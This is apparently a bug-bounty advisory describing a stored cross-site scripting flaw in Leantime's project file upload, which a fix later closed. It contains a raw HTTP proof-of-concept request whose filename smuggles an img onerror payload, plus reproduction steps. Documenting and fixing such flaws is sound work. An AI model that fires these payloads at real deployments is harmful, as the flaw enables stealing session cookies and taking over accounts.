Cross-site Scripting (XSS) - Stored in leantime/leantime

Valid

Reported on

Nov 1st 2021


Description

Stored XSS via filename when upload file

Proof of Concept

// PoC.req
POST /leantime/public//projects/showProject/3 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------4148739525669256752671116272
Content-Length: 71553
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/leantime/public//projects/showProject/3
Cookie: 127001corebos=id8sv6vt012aj21319s5q16lp8; PHPSESSID=tjrsiun42kolr8imto0cv5qvpd; XSRF-TOKEN=eyJpdiI6IlJtckQrZ0FsM0ZDaFppZWNhZHhUNEE9PSIsInZhbHVlIjoiMm52ODQwMmlnTDBaU2RQelRoMWk3elBZdVlERS9UUVdOL2NBb24yVzJlTEl4cTNWejdkYUt0R1NPWlRIZDJrQk40dVdQM3BwbDRNenhmRWRGdWRPV1VuK2l6b251Tm1UVTJKR2cxcHJYV3d3ZmpuMHYvQU1CZ1BQNGtyWkJnRVMiLCJtYWMiOiJhZTlmOGVlYTNjODYxYjQ2ZmM1YjNlMWVhNTg4MzJhYTU1YmM2NzJhNjIwZjlhYjgxZTU1NmNmMDhiOGNmZGM3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im9qYWZQcVpJZTF2QklNSjVMeHpFaXc9PSIsInZhbHVlIjoicTRxSndoNDdpRjBuYWxFVklaeFoxbEMvOFI2NW0zWExJcE81cDVBK1pkY3dXZEhNY1hXLzN5R0djelJURzA0bElWeC9zN1drQUlUUWZJaHN6eDNER1FDa3ZXdGZmSkJpWDNrN2lMMzV6Z2o2MmpMUGFpV0w3R01YM1FlbWVHeHgiLCJtYWMiOiJmYjFjNGE1YzM1ZDUwOWNiYWM2ZDQwYzVhMDMzY2IxZDRjNDk4NGNhODA2ZDRmZDZiMGJmMDlhMDMxYjM1YjFiIiwidGFnIjoiIn0%3D; sid=cecedc4236bbfb8d968f5370f8a42324fbb3ea99-89b8102536c949c0f917e83121e7b36ff776c8ef
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------4148739525669256752671116272
Content-Disposition: form-data; name="file"; filename="Sun'><img src=x onerror=alert(1)>set.jpg"
Content-Type: image/jpeg

ÿØÿàJFIF``ÿí
Photoshop 3.08BIMí
Resolution``8BIM
FX Global Lighting Anglex8BIMFX Global Altitude8BIMóPrint Flags   8BIM
Copyright Flag8BIM'Japanese Print Flags
8BIMõColor Halftone SettingsH/fflff/ff¡™š2Z5-8BIMøColor Transfer Settingspÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿè8BIMGuides@@8BIM
URL overrides8BIMSlicesuX 
Untitled-2 X8BIMICC Untagged Flag8BIMLayer ID Generator Base8BIMNew Windows Thumbnail    opTPn@ SÿØÿàJFIFHHÿîAdobed€ÿۄ        

-----------------------------4148739525669256752671116272
Content-Disposition: form-data; name="upload"

Upload
-----------------------------4148739525669256752671116272--

Step to Reproduct

Create file with name like: test'><img src=x onerror=alert(1)>xss.jpg

Goto Project Setting, choose to one project and at Files choose the file and upload

The XSS will trigger when upload success.

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We have contacted a member of the leantime team and are waiting to hear back a month ago
We have contacted a member of the leantime team and are waiting to hear back a month ago
We have sent a follow up to the leantime team. We will try again in 7 days. a month ago
We have sent a follow up to the leantime team. We will try again in 7 days. a month ago
We have sent a second follow up to the leantime team. We will try again in 10 days. a month ago
We have sent a second follow up to the leantime team. We will try again in 10 days. a month ago
lethanhphuc submitted a
22 days ago
Marcel Folaron validated this vulnerability 21 days ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Marcel Folaron confirmed that a fix has been merged on 9552c5 21 days ago
lethanhphuc has been awarded the fix bounty
showProject.tpl.php#L104 has been validated